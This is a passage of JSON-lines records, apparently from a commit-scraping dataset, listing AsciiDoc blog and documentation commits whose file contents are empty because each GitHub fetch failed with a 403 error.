2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e237e7a6c2bdad40a94d4396dfd953a0fe2c7f3","subject":"Renamed '_posts\/2018-10-14-TEST.adoc' to '_posts\/2019-01-31-My-English-Title.adoc'","message":"Renamed '_posts\/2018-10-14-TEST.adoc' to '_posts\/2019-01-31-My-English-Title.adoc'","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5312c3b1e3d653c18906dae97ff0789c584231f1","subject":"Update 2016-10-05-Episode-74-Antisocial-Arachnids-and-Full-Service-Servos.adoc","message":"Update 2016-10-05-Episode-74-Antisocial-Arachnids-and-Full-Service-Servos.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-10-05-Episode-74-Antisocial-Arachnids-and-Full-Service-Servos.adoc","new_file":"_posts\/2016-10-05-Episode-74-Antisocial-Arachnids-and-Full-Service-Servos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd3247cd6cc571bfb485b4ef7c9a268a52529ab7","subject":":sparkles: npm debug","message":":sparkles: npm debug\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/npm-debug.adoc","new_file":"src\/refills\/javascript\/npm-debug.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c3535a9129a8eba60f76a698a459744e94be228","subject":"y2b create post Orbita Voyager Travel Watchwinder Unboxing \\u0026 Overview","message":"y2b create post Orbita Voyager Travel Watchwinder Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-09-Orbita-Voyager-Travel-Watchwinder-Unboxing--u0026-Overview.adoc","new_file":"_posts\/2011-01-09-Orbita-Voyager-Travel-Watchwinder-Unboxing--u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9acec8756c58dd588e4564363135b8b994ef057f","subject":"Update 2015-06-18-Hello-World.adoc","message":"Update 2015-06-18-Hello-World.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-Hello-World.adoc","new_file":"_posts\/2015-06-18-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aadd4f421e8ef166fabb631043e4c320bbb3f557","subject":"Update 2019-01-06-G-A-S-Slack.adoc","message":"Update 2019-01-06-G-A-S-Slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-06-G-A-S-Slack.adoc","new_file":"_posts\/2019-01-06-G-A-S-Slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d917eaeb89e255e90a27effa365085bd58255cd","subject":"y2b create post Virtual Reality for iPhone or Android!","message":"y2b create post Virtual Reality for iPhone or Android!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-15-Virtual-Reality-for-iPhone-or-Android.adoc","new_file":"_posts\/2016-07-15-Virtual-Reality-for-iPhone-or-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb6c780d22c3eb4f87e56f78df40aa6ed9b30b2c","subject":"fix spelling mistake","message":"fix spelling mistake\n","repos":"danmack\/resume","old_file":"interests.adoc","new_file":"interests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51bfecc7cb9f00208887e3bf5e3684c4645fa47b","subject":"[DOCS] fixes word usage in allocation awareness docs","message":"[DOCS] fixes word usage in allocation awareness docs\n","repos":"C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fernandozhu\/elasticsearch,bawse\/elasticsearch,rajanm\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,spiegela\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,bawse\/elasticsearch,scottsom\/elasticsearch,JackyMai\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,rajanm\/elasticsearch,jprante\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,nazarewk\/elasticsearch,Shepard1212\/elasticsearch,C-Bish\/elasticsearch,mikemccand\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,umeshdangat\/elasticsearch,elasticdog\/elasticsearch,fernandozhu\/elasticsearch,mortonsykes\/elasticsearch,elasticdog\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,Helen-Zhao\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,gingerwizard\/elasticsearch,fforbeck\/elasticsearch,nilabhsagar\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,MisterAndersen\/elasticsearch,JackyMai\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,mikemccand\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,henakamaMSFT\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,Shepard1212\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,geidies\/elasticsearch,MaineC\/elasticsearch,strapdata\/elassandra,JSCooke\/elasticsearch,a2lin\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,mortonsykes\/elasticsearch,HonzaKral\/elasticsearch,wuranbo\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,spiegela\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MaineC\/elasticsearch,lks21c\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,fforbeck\/elasticsearch,sneivandt\/elasticsearch,StefanGor\/elasticsearch,henakamaMSFT\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,MaineC\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,geidies\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,C-Bish\/elasticsearch,mohit\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,nazarewk\/elasticsearch,JackyMai\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,artnowo\/elasticsearch,elasticdog\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,artnowo\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,robin13\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,Shepard1212\/elasticsearch,MisterAndersen\/elasticsearch,jimczi\/elasticsearch,MaineC\/elasticsearch,rlugojr\/elasticsearch,njlawton\/elasticsearch,nknize\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,mortonsykes\/elasticsearch,GlenRSmith\/elasticsearch,njlawton\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elassandra,qwerty4030\/elasticsearch,obourgain\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,i-am-Nathan\/elasticsearch,nknize\/elasticsearch,njlawton\/elasticsearch,masaruh\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fforbeck\/elasticsearch,alexshadow007\/elasticsearch,wuranbo\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,vroyer\/elasticassandra,uschindler\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elassandra,jprante\/elasticsearch,fernandozhu\/elasticsearch,JSCooke\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,mikemccand\/elasticsearch,rajanm\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,scottsom\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,glefloch\/elasticsearch,scorpionvicky\/elasticsearch,rlugojr\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,shreejay\/elasticsearch,nazarewk\/elasticsearch,artnowo\/elasticsearch,IanvsPoplicola\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,rlugojr\/elasticsearch,glefloch\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,henakamaMSFT\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,s1monw\/elasticsearch,a2lin\/elasticsearch,winstonewert\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,geidies\/elasticsearch,nilabhsagar\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,alexshadow007\/elasticsearch,henakamaMSFT\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,rlugojr\/elasticsearch,JackyMai\/elasticsearch,shreejay\/elasticsearch,mikemccand\/elasticsearch,LewayneNaidoo\/elasticsearch,MisterAndersen\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,i-am-Nathan\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,artnowo\/elasticsearch,jprante\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,glefloch\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,umeshdangat\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,obourgain\/elasticsearch,uschindler\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,artnowo\/elasticsearch,vroyer\/elassandra,winstonewert\/elasticsearch,kalimatas\/elasticsearch","old_file":"docs\/reference\/modules\/cluster\/allocation_awareness.asciidoc","new_file":"docs\/reference\/modules\/cluster\/allocation_awareness.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57477b98344d75de28fc77e35e87830a77ae9cb3","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da7f9363c9ce063a0f26971006a3ef2bb37777aa","subject":"Update 2016-04-20-Zen-Studios-Drops-a-Teaser-Trailer-For-Alien-Isolation.adoc","message":"Update 2016-04-20-Zen-Studios-Drops-a-Teaser-Trailer-For-Alien-Isolation.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-04-20-Zen-Studios-Drops-a-Teaser-Trailer-For-Alien-Isolation.adoc","new_file":"_posts\/2016-04-20-Zen-Studios-Drops-a-Teaser-Trailer-For-Alien-Isolation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"367199797c3cdf42a3e6db014454820f8737a9fd","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08e3c1f2b3f2e4c90893b32ccbcdd8a710fc7d12","subject":"Works on documentation","message":"Works on documentation\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/manpage\/libndrxxapq.adoc","new_file":"doc\/manpage\/libndrxxapq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"0cdddd7e1253c299bc985feafec9acc4a795f856","subject":"y2b create post Color Shield for iPhone 4 \\u0026 4S Review","message":"y2b create post Color Shield for iPhone 4 \\u0026 4S Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-02-Color-Shield-for-iPhone-4-u0026-4S-Review.adoc","new_file":"_posts\/2011-12-02-Color-Shield-for-iPhone-4-u0026-4S-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"108352942b46df0d3cf5f25a685d0693d29e2a43","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/18\/deref.adoc","new_file":"content\/news\/2022\/11\/18\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f1b3452d068adea255ef94273357a0d8f2db33b3","subject":"Create ideas.adoc","message":"Create ideas.adoc","repos":"community-graph\/documentation","old_file":"ideas.adoc","new_file":"ideas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/community-graph\/documentation.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94187f46cdc218687a68cfec8d050556b1bad2d9","subject":"Update 2017-02-17-Dragon-curve-is-drawn-with-ps5js-while-learning-recursive-algorithm.adoc","message":"Update 2017-02-17-Dragon-curve-is-drawn-with-ps5js-while-learning-recursive-algorithm.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-Dragon-curve-is-drawn-with-ps5js-while-learning-recursive-algorithm.adoc","new_file":"_posts\/2017-02-17-Dragon-curve-is-drawn-with-ps5js-while-learning-recursive-algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"536137e2a345bc34edc8989eb3b1245eefd7e5fd","subject":"Update 2016-06-12-My-first-post.adoc","message":"Update 2016-06-12-My-first-post.adoc","repos":"thesagarsutar\/hubpress,thesagarsutar\/hubpress,thesagarsutar\/hubpress,thesagarsutar\/hubpress","old_file":"_posts\/2016-06-12-My-first-post.adoc","new_file":"_posts\/2016-06-12-My-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thesagarsutar\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ac0e9fdbff7cdfb600db94fa89b2c49be409109","subject":"Update 2018-07-28-New-Milestone.adoc","message":"Update 2018-07-28-New-Milestone.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-28-New-Milestone.adoc","new_file":"_posts\/2018-07-28-New-Milestone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12f21dca133ea199c3f960d96238871b12df3bb0","subject":"Update 2019-01-31-java-language.adoc","message":"Update 2019-01-31-java-language.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-java-language.adoc","new_file":"_posts\/2019-01-31-java-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb38260078f071bf386c06b5cd5f1f6ee050f4ed","subject":"Publish 2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","message":"Publish 2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","new_file":"2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e95ae5a43074f3963283df669285abbe08fd7b30","subject":"Update 2019-01-31-Dired-to-clipboard.adoc","message":"Update 2019-01-31-Dired-to-clipboard.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2019-01-31-Dired-to-clipboard.adoc","new_file":"_posts\/2019-01-31-Dired-to-clipboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc38918a21bc9aab4d90c21e8183f9a811116c0","subject":"y2b create post Android Ice Cream Sandwich Review (Nexus S)","message":"y2b create post Android Ice Cream Sandwich Review (Nexus S)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-26-Android-Ice-Cream-Sandwich-Review-Nexus-S.adoc","new_file":"_posts\/2011-10-26-Android-Ice-Cream-Sandwich-Review-Nexus-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db566c4cb76a13e1e4da34b23a3274c6a6d6c509","subject":"Update 2017-09-07-Semi-automatic-Jenkins-upgrade-on-Windows.adoc","message":"Update 2017-09-07-Semi-automatic-Jenkins-upgrade-on-Windows.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-09-07-Semi-automatic-Jenkins-upgrade-on-Windows.adoc","new_file":"_posts\/2017-09-07-Semi-automatic-Jenkins-upgrade-on-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"758db103bf6adff3cde0fec1bb04d97a4ae4e520","subject":"Update 2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be009a9bdf2471a2ffceeac479ec2810fdfc91e6","subject":"Update 2016-10-25-Exame-de-Rotina.adoc","message":"Update 2016-10-25-Exame-de-Rotina.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2016-10-25-Exame-de-Rotina.adoc","new_file":"_posts\/2016-10-25-Exame-de-Rotina.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62717e6d680d23828478c016ba2c7627ab1ee42a","subject":"Update 2016-10-29-Getting-Started.adoc","message":"Update 2016-10-29-Getting-Started.adoc","repos":"laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io","old_file":"_posts\/2016-10-29-Getting-Started.adoc","new_file":"_posts\/2016-10-29-Getting-Started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laposheureux\/laposheureux.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"babffad9ac2256746653068a897225fec4d25d61","subject":"Add README-ja.adoc","message":"Add README-ja.adoc\n","repos":"locnh\/locnh.github.io,KozytyPress\/kozytypress.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,wayr\/wayr.github.io,StefanBertels\/stefanbertels.github.io,iwakuralai-n\/badgame-site,apalkoff\/apalkoff.github.io,angilent\/angilent.github.io,tedbergeron\/hubpress.io,swhgoon\/blog,scholzi94\/scholzi94.github.io,darkfirenze\/darkfirenze.github.io,jborichevskiy\/jborichevskiy.github.io,mrcouthy\/mrcouthy.github.io,olivierbellone\/olivierbellone.github.io,lerzegov\/lerzegov.github.io,AlonsoCampos\/AlonsoCampos.github.io,dakeshi\/dakeshi.github.io,sitexa\/hubpress.io,Nil1\/Nil1.github.io,Brzhk\/Brzhk.github.io,hapee\/hapee.github.io,demohi\/blog,alchemistcookbook\/alchemistcookbook.github.io,caryfitzhugh\/caryfitzhugh.github.io,neomobil\/neomobil.github.io,crazyrandom\/crazyrandom.github.io,lxjk\/lxjk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,icthieves\/icthieves.github.io,devopSkill\/devopskill.github.io,darsto\/darsto.github.io,raisedadead\/hubpress.io,jaredmorgs\/jaredmorgs.github.io,regdog\/regdog.github.io,dannylane\/dannylane.github.io,MartinAhrer\/martinahrer.github.io,dfjs\/dfjs.github.io,shutas\/shutas.github.io,deformat\/deformat.github.io,neocarvajal\/neocarvajal.github.io,anshu92\/blog,woehrl01\/woehrl01.hubpress.io,ioisup\/ioisup.github.io,chrizco\/chrizco.github.io,nullbase\/nullbase.github.io,realraindust\/realraindust.github.io,lametaweb\/lametaweb.github.io,blogforfun\/blogforfun.github.io,kay\/kay.github.io,bretonio\/bretonio.github.io,deivisk\/deivisk.github.io,AppHat\/AppHat.github.io,Dekken\/dekken.github.io,gardenias\/sddb.com,zouftou\/zouftou.github.io,jrhea\/jrhea.github.io,kunicmarko20\/kunicmar